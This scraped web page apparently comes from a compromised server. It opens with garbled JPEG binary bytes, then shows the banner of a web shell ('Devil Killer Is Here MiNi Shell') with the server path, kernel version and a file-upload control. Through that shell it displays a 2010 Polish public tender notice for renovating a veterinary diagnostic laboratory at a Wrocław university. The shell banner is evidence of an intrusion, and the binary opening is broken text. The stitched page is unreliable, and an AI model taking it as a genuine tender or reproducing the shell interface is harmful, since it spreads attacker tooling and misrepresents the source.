JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101004/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101004/272797-N-2010.html

<p class="kh_header"><b>Wrocław: Modernizacja pomieszczeń laboratoryjnych Wydziałowego Laboratorium Diagnostycznego Katedry Chorób Wewnętrznych i Pasożytniczych z Kliniką Chorób Koni, Psów i Kotów we Wrocławiu, pl. Grunwaldzki 47  RAP 112 2010</b><br>
<b>Numer ogłoszenia: 272797 - 2010; data zamieszczenia: 04.10.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet Przyrodniczy we Wrocławiu , ul. C.K. Norwida 25/27, 50-375 Wrocław, woj. dolnośląskie, tel. 071 3283576, 3205496, faks 071 3283576.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.up.wroc.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> zamawiajacy nie przewiduje ustanowienia dsz</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja pomieszczeń laboratoryjnych Wydziałowego Laboratorium Diagnostycznego Katedry Chorób Wewnętrznych i Pasożytniczych z Kliniką Chorób Koni, Psów i Kotów we Wrocławiu, pl. Grunwaldzki 47  RAP 112 2010.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> OGÓLNA CHARAKTERYSTYKA ROBÓT 

Zakres prac określony do wykonania remontu- obejmuje:
Modernizacja  pomieszczeń laboratoryjnych dla Wydziałowego Laboratorium Diagnostycznego Katedry Chorób Wewnętrznych i Pasożytniczych z Kliniką Chorób Koni, Psów i Kotów we Wrocławiu  pl. Grunwaldzki 47
- Roboty rozbiórkowe i wywóz odpadów. 
-Roboty malarskie:
Malowanie farbą emulsyjną ścian i sufitów
-Malowanie farbą olejną stolarki 
-Malowanie farbą olejną krat, grzejników, rur - 
-Uzupełnienie tynków na ścianach - 
- rozebranie wykładzin ściennych i podłogowych
- uzupełnienie tynków
- wykonanie gładzi gipsowych
- wykonanie nowych okładzin ściennych z płytek ceramicznych
- wykonanie posadzki z płytek 	

Wykonanie instalacji elektrycznych:
Całą instalację elektryczną pełny zakres wykonać w układzie TN-S. Poczynając od
tablicy elektrycznej wszystkie instalacje wykonać podtynkowo.
Instalacje wodociągowe cwu. i kanalizacji sanitarnej 
- wymiana pionów i instalacji wod.-kan. 
doprowadzenie wody zimnej i ciepłej nad zlewy,
podłączenie do przyborów    
 -do stołów laboratoryjnych tylko wody zimnej i odpływów,  rury wodne z PP, a kanalizacja  z PCV 
Instalacja centralnego ogrzewania   
wymiana grzejników na C22
 wymiana pionów
Montaż zaworów termostatycznych, powrotnych, odpowietrzających.
Wentylacja
  - wentylacja ogólna mechaniczna wywiewna wentylatorem             
  - montaż central wentylacyjnych
       wentylacja wyciągowa dygestorium - indywidualne układy
Instalacja gazowa
Zdemontować  zbędne rury i zakorkować czynną instalację
 montaż podejść gazowych do stołów wraz z kurkami gazowymi.


Pokoje 201 i 202
 1 Zerwanie wykładziny z tworzyw sztucznych i posadzki 
 2 Demontaż drzwi wraz z ościeżnicami
 3 Rozebranie ścianki działowej z pozostawieniem murku na środku o wys 1,20 i ścianki przy wejściu jako bocznej ściany szafy wbudowanej
 4 Odbicie tynków pod płytki ceramiczne
 5 Wykucie otworu pod okienko podawcze Należy przed przystąpieniem do prac sprawdzić położenie przewodów wentylacyjnych
 6 Wykonanie nowych tynków pod płytki ceramiczne 
 7 Montaż nowych drzwi oraz okienka podawczego
 8 Zaślepienie luksferów nad oknami
 9 Wykonanie posadzki i podłogi z płytek ceramicznych
10 Okładziny ścian płytkami ceramicznymi tylko w pom 202 i na murku pod blat
11 Malowanie pomieszczenia
12. Montaż  szafy  wnękowej  zamykanej  drzwiami   w  pom 202 na całą długość ściany od  korytarza i na ścianie szczytowej na długości ok 2,5 m Podział szafy uzgodnić z Użytkownikiem
13 Ewentualnie montaż blatów na murku w pom 201 alternatywnie zostaną zamówione przez Użytkownika

Pokój 203 
 1 Zerwanie posadzki z tworzyw sztucznych i posadzki z płytek ceramicznych
 2 Demontaż drzwi wraz z ościeżnicami
 3 Odbicie płytek ceramicznych i tynków ze ściany
 4 Zamurowanie cegłą otworu drzwiowego pomiędzy pokojami 204 i 205 oraz drzwi na korytarz
 5 Wykonanie otworu nowego otworu drzwiowego  odległość krawędzi otworu 1,60 m od ściany wewnętrznej korytarza
 6 Wykonanie nowych tynków pod płytki ceramiczne i tynków w miejscach zamurowanych otworów
 7 Wykonanie posadzek z płytek ceramicznych 
 8 Okładziny ścian płytkami ceramicznymi
 9 Montaż nowych drzwi
10 Malowanie pomieszczenia

Pokój 205
1 Zerwanie posadzki z tworzyw sztucznych i posadzki z płytek ceramicznych
2 Demontaż drzwi wraz z ościeżnicami
3 Odbicie płytek ceramicznych i tynków ze ściany
4 Wykonanie nowych tynków 
5 Wykonanie posadzek z płytek ceramicznych 
6 Montaż nowych drzwi
7 Malowanie pomieszczenia
8 Montaż szafy wnękowej na ścianie od korytarza. Podział w pionie na cztery części, drzwiczki  zamykane na klucz Dokładny rozkład półek uzgodnić z Użytkownikiem

Pokój 207
1 Zerwanie posadzki istniejącej
2 Demontaż drzwi wraz z ościeżnicami
3 Odbicie płytek ceramicznych i tynków ze ściany
4 Wykonanie nowych tynków 
5 Wykonanie posadzek z płytek ceramicznych i fartucha  z płytek przy umywalce
6 Montaż nowych drzwi
7 Malowanie pomieszczenia

Pokój 208
1 Zerwanie posadzki istniejącej
2 Demontaż drzwi wraz z ościeżnicami
3 Odbicie płytek ceramicznych i tynków ze ściany
4 Wykonanie nowych tynków 
5 Wykonanie posadzek z wykładziny dywanowej
6 Montaż nowych drzwi
7 Wykonanie szafy wbudowanej podobnej do szafy w pomieszczeniu nr 210
8 Malowanie pomieszczenia

Wyszczególnienie i opis prac towarzyszących i robót tymczasowych
działania ochronne zgodne z warunkami BHP
usuwanie na bieżąco z terenu budowy odpadów  gruzu oraz zanieczyszczeń spowodowanych przez wykonawcę

Informacje o terenie budowy  Organizacja robót budowlanych
możliwość realizacji robót w systemie dwuzmianowym po uzgodnieniu z Inwestorem
Zabezpieczenia interesów osób trzecich nie dotyczy
Ochrona środowiska wywóz gruzu na odpowiednie wysypiska
Warunki bezpieczeństwa pracy pracownicy przeszkoleni w zakresie BHP z aktualnymi badaniami Medycyny Pracy dopuszczającymi do wykonywania odpowiednich robót
Zaplecze dla potrzeb wykonawcy zapewni Użytkownik
Warunki dotyczące organizacji ruchu nie dotyczy
Ogrodzenia nie dotyczy
Zabezpieczenia chodników i jezdni nie dotyczy

Określenia podstawowe brak wymogów

Wymagania  dotyczące  właściwości wyrobów budowlanych oraz niezbędne  wymagania związane  z ich przechowaniem transportem warunkami dostawy składowaniem i kontrolą jakości odniesione do postanowień norm
aktualne certyfikaty i deklaracje zgodności wg przepisów Unijnych 
wszystkie materiały w gatunku pierwszym
  
Wymagania dotyczące sprzętu i maszyn wg KNR

Wymagania dotyczące środków transportu wg KNR oraz ręcznie na terenie budowy

Wymagania dotyczące wykonania robót budowlanych wg Warunków Technicznych Wykonania Robót Budowlanych zgodnie z obowiązującymi normami
Przed    zakupem    i    montażem    wiodące   materiały    uzgodnić   z Inspektorem   Nadzoru  i użytkownikiem
   
Opis działań związanych z kontrolą, badaniami oraz odbiorem wyrobów i robót   budowlanych wg zaleceń Inspektora Nadzoru Budowlanego

Wymagania dotyczące przedmiaru i obmiaru robót kosztorys ofertowy wg środowiskowych metod sporządzania kosztorysów kosztorys powykonawczy  faktycznie wykonanych robót wg czynników cenotwórczych zgodnych z  kosztorysem ofertowym.

Opis sposobu odbioru robót budowlanych wg  Warunków Technicznych Wykonania i Odbioru Robót Budowlano Montażowych wraz z odbiorami częściowymi	
odbiór robót  po zgłoszeniu na piśmie przez Wykonawcę i  potwierdzone  przez Inspektora  Nadzoru o gotowości do odbioru Dostarczeniu Inwestorowi deklaracji zgodności na materiały które tego wymagają

Opis sposobu rozliczenia robót  tymczasowych i prac towarzyszących jako element kosztów ogólnych w kosztorysie powykonawczym

Dokumenty odniesienia dokumenty będące podstawą do wykonania robót  budowlanych zawarcie umowy z Uniwersytetem Przyrodniczym we Wrocławiu
protokół przekazanie placu budowy przez Dział Techniczny
książka przedmiarów charakterystyka robót

	
Przedmiot i zakres robót budowlanych	
Roboty wg przedmiaru
Remont  swoim zakresem obejmuje całkowitą wymianę instalacji elektrycznej wraz z instalacją nowej  tablicy elektrycznej w laboratorium w pom nr 204 i w piwnicy Nową tablicę w laboratorium zasilić przewodem typu YDY 5x6 mm2
Tablicę w piwnicy zasilić kablem YKY 5x35 mm2 wyprowadzonym z rozdzielnicy głównej obiektu Z tablicy w piwnicy kablem YKY 5x25 mm2 zasilić nową tablicę na korytarzu  2  piętra  w miejscu tablicy istniejącej Z tablicy na korytarzu zasilić tablicę w laboratorium w  pom 04  i  odbiorniki  na  dachu  centrale   wentylacyjne wentylatory i klimatyzatory i odbiory w pom nr 201-202
Poczynając od tablic do wszystkich pomieszczeń ułożyć nowe przewody
YDYp 3x1.5 mm2 dla oświetlenia  
YDYp 3x2.5 mm2 dla zasilania gniazd wtyczkowych 1-0 fazowych  przewodem typu YDYp 5x2.5 mm2 i 3x2.5 mm2- dla zasilania wentylatorów Instalację gniazda 3-fazowego 16A. wykonać przewodem  YDY 5x2.5 mm2
Stosować oprawy świetlówkowe 2x36W z rastrem i z zapłonem elektronicznym 4szt w/w  opraw  i  2  oprawy  z   piktogramem   WYJŚCIE   wyposażyć   w   moduł   awaryjny   3h   W pomieszczeniu eterowym instalować 3 oprawy 2x36W w wykonaniu przeciwwybuchowym Puszki i łączniki na zewnątrz pomieszczenia
Poczynając od tablic nową instalację wykonać podtynkowo w układzie TN S
Po zakończeniu prac montażowych wykonać pomiary rezystancji izolacji skuteczności ochrony od porażeń prądem elektrycznym natężenia oświetlenia elektrycznego Badania wyłączników różnicowo prądowych i ciągłości połączeń wyrównawczych
Szczegółowe przedmiary robót w załączeniu
    
Wyszczególnienie i opis prac towarzyszących i robót tymczasowych
Wykonanie jednobiegunowego schematu połączeń wykonanej instalacji

Informacje o terenie budowy
Organizacja robót budowlanych Możliwość  realizacji robót w systemie dwuzmianowym po    uzgodnieniu   z Użytkownikiem.
Zabezpieczenia interesów osób trzecich
W przypadku zajęć w sąsiednich salach, nie wykonywać hałaśliwych robót
Ochrona środowiska Wywóz gruzu na odpowiednie wysypiska
Warunki bezpieczeństwa pracy Pracownicy przeszkoleni w zakresie BHP z aktualnymi badaniami Medycyny Pracy i zaświadczeniami SEP dopuszczającymi do wykonywania odpowiednich robót Miejsce pracy oznakowane i zabezpieczone
Zaplecze dla potrzeb wykonawcy Zapewni Użytkownik
Warunki dotyczące organizacji ruchu Nie dotyczy
Ogrodzenia Nie dotyczy
Zabezpieczenia chodników i jezdni Nie dotyczy

Określenia podstawowe Brak wymogów

Wymagania dotyczące  właściwości  wyrobów  budowlanych oraz niezbędne wymagania związane  z ich przechowaniem transportem warunkami dostawy składowaniem i kontrolą jakości odniesione do postanowień norm
Wg PN przenoszących EN zharmonizowanych dyrektywa 89 106 EWG przywołanych  w rozporządzeniu Ministra Infrastruktury DzU  z  2002r  Nr 75 poz 690 Aktualne certyfikaty i deklaracje zgodności wg przepisów unijnych

Wymagania dotyczące sprzętu i maszyn Zgodnie z technologią wg Przedmiaru Robót
	
Wymagania dotyczące środków transportu Wg KNR oraz ręcznie na terenie budowy
Wymagania dotyczące wykonania robót budowlanych Wg Warunków Technicznych Wykonania Robót Elektrycznych zgodnie z obowiązującymi   normami  Przed  zakupem  i  montażem  materiały uzgodnić z Inspektorem Nadzoru i Użytkownikiem

Opis działań związanych z kontrolą, badaniami oraz odbiorem wyrobów i robót budowlanych
Pomiary rezystancji izolacji obwodów oświetleniowych i gniazd wtyczkowych na napięciu 500V pomiary skuteczności ochrony od porażeń prądem elektrycznymi natężenia oświetlenia    oraz   badania wyłączników różnicowo prądowych Sprawdzenie czasów i zakresów wyłączania  wyłączników różnicowo prądowych

Wymagania dotyczące przedmiaru i obmiaru robót kosztorys ofertowy wg środowiskowych metod sporządzania kosztorysów kosztorys powykonawczy wg  faktycznie wykonanych robót i czynników cenotwórczych zgodnych z  kosztorysem ofertowym

Opis sposobu odbioru robót budowlanych Wg Warunków wykonania i odbioru robót budowlano montażowych cz elektryczna Odbiorom częściowym podlegają roboty zanikające i ulegające zakryciu roboty rozliczane fakturą częściową

Opis sposobu rozliczenia robót  tymczasowych i prac towarzyszących Jako element kosztów ogólnych w kosztorysie powykonawczym

Dokumenty odniesienia dokumenty będące podstawą do wykonania robót budowlanych Umowa z Uniwersytetem Przyrodniczym we Wrocławiu
protokół przekazania placu budowy przedmiar robót wraz z charakterystyką robót
specyfikacja techniczna obowiązujące przepisy i normy certyfikaty aprobaty techniczne deklaracje zgodności atesty stosownie do oddzielnych przepisów

   
Przedmiot i zakres robót budowlanych  Roboty wg przedmiaru
Instalacja co  wymiana grzejników żeliwnych na stalowe 2płytowe C22 w niektórych pokojach na higieniczne z dopasowaniem gałązek zaworów przy grzejnikach na termostatyczne montaż zaworów powrotnych i montaż zasilających
Instalacja kanalizacji  demontaż istniejącej kanalizacji, wymiana pionu kanalizacyjnego na PCV dn 110mm oraz podejścia pod przybory
Pozostałą kanalizację wykonać z rur PCV
Instalacja wodociągowa demontaż  instalacji  wodociągowej zw i cw wykonać nowe doprowadzenie wody zimnej i ciepłej do przyborów i umywalek Montaż baterii bezdotykowych laboratoryjnych Instalację cw i zw wykonać z PP PN 16 zgodnie z ustaleniami z inspektora nadzoru Montaż natrysku bezpieczeństwa 
Instalacja gazowa
Wymiana podejść i przewodów w ograniczonym zakresie
Instalacja wentylacyjna 
Montaż central wentylacyjnych
700m3 na h o mocy 11kW mocy grzewczej elektrycznej
1400m3 o mocy 19kW mocy grzewczej elektrycznej
Wymiana wentylatorów dachowych w uzgodnieniu z inspektorem nadzoru
Instalacja klimatyzacyjna
Demontaż 2jednostek istniejących i montaż 7 szt jednostek typu split
zdemontowany złom przekazać protokółem do Działu Konserwacji  
Demontaż i ponowny montaż digestorii      

Wyszczególnienie i opis prac towarzyszących i robót tymczasowych
transport gruzu  ręczny
spuszczenie i napełnienie instalacji c.o. po stronie Inwestora
po zakończeniu prac budowlanych obowiązkowe przeczyszczenie kanalizacji łącznie z przyłączem potwierdzone protokółem  
inwentaryzacja powykonawcza naniesiona na projekt

Informacje o terenie budowy   Organizacja robót budowlanych
Możliwość realizacji robót w systemie dwuzmianowym
Zabezpieczenia interesów osób trzecich
Z uwagi na funkcjonowanie obiektu prace uciążliwe wykonywać w godzinach uzgodnionych z kierownikiem Rejonu UP
Ochrona środowiska Utylizacja szkodliwych odpadów
Warunki bezpieczeństwa pracy Realizacja robót w czynnym obiekcie musi zapewnić bezpieczeństwo osób tam pracujących
Zaplecze dla potrzeb wykonawcy   Zapewni Użytkownik
Warunki dotyczące organizacji ruchu Dojazd do placu budowy droga publiczną i wewnętrzną UP
Ogrodzenia  Nie konieczne
Jezdnie i chodniki oraz korytarz na bieżąco oczyszczać z  naniesionego błota i gruzu Po zakończeniu robót przywrócić do stanu pierwotnego

Określenia podstawowe Wg Prawa Budowlanego
Wymagania dotyczące właściwości wyrobów budowlanych oraz niezbędne
wymagania związane  z ich przechowaniem, transportem, warunkami dostawy  
składowaniem i kontrolą jakości odniesione do postanowień norm
Przed zakupem i montażem wiodące materiały i urządzenia uzgodnić z Inspektorem Nadzoru
Materiały powinny być I gat nowe i odpowiadać wymaganiom przedmiar
Posiadać aktualne certyfikaty i deklaracje zgodności wg przepisów unijnych
Składowanie materiałów zgodnie z zaleceniami Producenta 
Wymagania dotyczące sprzętu i maszyn Odpowiedni do przyjętej technologii
Wymagania dotyczące środków transportu Transport urządzeń zgodnie z wymaganiami producenta
Wymagania dotyczące wykonania robót budowlanych: Montaż instalacji wod kan co  i wentylacji  zgodnie z Warunkami technicznymi wykonania i odbioru robót bud.-montażowych T.II i  z instrukcjami producentów poszczególnych urządzeń
Opis działań związanych z kontrolą badaniami oraz odbiorem wyrobów i robót     budowlanych
sprawdzenie szczelności połączeń i regulacja  instalacji co
próba szczelności  inst. wodnej wodą o ciś 0,9MPa w czasie 0,5 godz potwierdzona   protokółem
sprawdzenie szczelności i drożności instalacji kanalizacyjnej potwierdzonej protokółem
pozytywne próby odebrane przez inspektora nadzoru pozwalają na przykrycie instalacji
Wymagania dotyczące przedmiaru i obmiaru robót	
kosztorys ofertowy wg środowiskowych metod sporządzania kosztorysów,
kosztorys  powykonawczy  wg  faktycznie  wykonanych  robót  czynników  cenotwórczych  zgodnych z  kosztorysem ofertowym
Opis sposobu odbioru robót budowlanych	
odbiór  robót   po  zgłoszeniu  na  piśmie  przez Wykonawcę i potwierdzeniu  przez Inspektora  Nadzoru o gotowości do odbioru
dostarczeniu Inwestorowi
gwarancji DTRek lub instrukcji obsługi  urządzeń z adnotacją o  wbudowaniu w ww obiekcie 
oświadczenia zestawienia zastosowanych urządzeń materiałów producent typ
deklaracji zgodności na urządzenia i materiały które tego wymagają
Opis sposobu rozliczenia robót  tymczasowych i prac towarzyszących jako element kosztów ogólnych w kosztorysie powykonawczym.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających do wysokości 50 proc. wartości zamówienia podstawowego.
Zamówienia uzupełniające w pełnym zakresie rodzajowym zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.43.00.00-0, 45.20.00.00-9, 45.42.11.00-5, 45.42.21.00-2, 45.43.10.00-7, 45.43.21.11-5, 45.44.21.00-8, 45.44.21.21-1, 45.45.30.00-7, 45.21.44.00-4, 45.21.46.10-9, 45.33.00.00-9, 45.33.12.00-8, 45.31.00.00-3, 45.31.12.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 105.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> w niniejszym postępowaniu Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie ustanawia szczegółowych warunków w tym zakresie, natomiast wykonawca winien złożyć stosowne oświadczenie będące załącznikiem nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że w okresie ostatnich pięciu lat co najmniej  dwóch zakresów  robót budowlanych odpowiadających swoim rodzajem  robotom będących  przedmiotem zamówienia i  każdej o wartości co najmniej 200 tys. zł brutto, polegających na remoncie i modernizacji pomieszczeń.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie ustanawia szczegółowych warunków w tym zakresie, natomiast wykonawca winien złożyć stosowne oświadczenie będące załącznikiem nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeśli Wykonawca wykaże, że dysponuje osobami posiadającymi kwalifikacje zawodowe, doświadczenie i uprawnienia na stanowisku:

-   kierownika budowy  posiadającego uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej oraz aktualne zaświadczenie odpowiedniego organu samorządu zawodowego Okręgowej Izby Inżynierów Budownictwa potwierdzające członkostwo,

-   kierownika robót elektrycznych posiadającego uprawnienia budowlane do kierowania robotami budowlanymi  w  specjalności  instalacji  o  raz  aktualne  zaświadczenie  potwierdzające  członkostwo w odpowiedniej Izbie Samorządu Zawodowego,

-  kierownika robót sanitarnych i wentylacyjnych posiadającego uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej (wod.-kan., gaz, co, wentylacyjnej) oraz aktualne zaświadczenie odpowiedniego organu samorządu zawodowego Okręgowej Izby Inżynierów Budownictwa potwierdzające członkostwo.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie ustanawia szczegółowych warunków w tym zakresie, natomiast Wykonawca winien złożyć stosowne oświadczenie będące załącznikiem nr 2 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

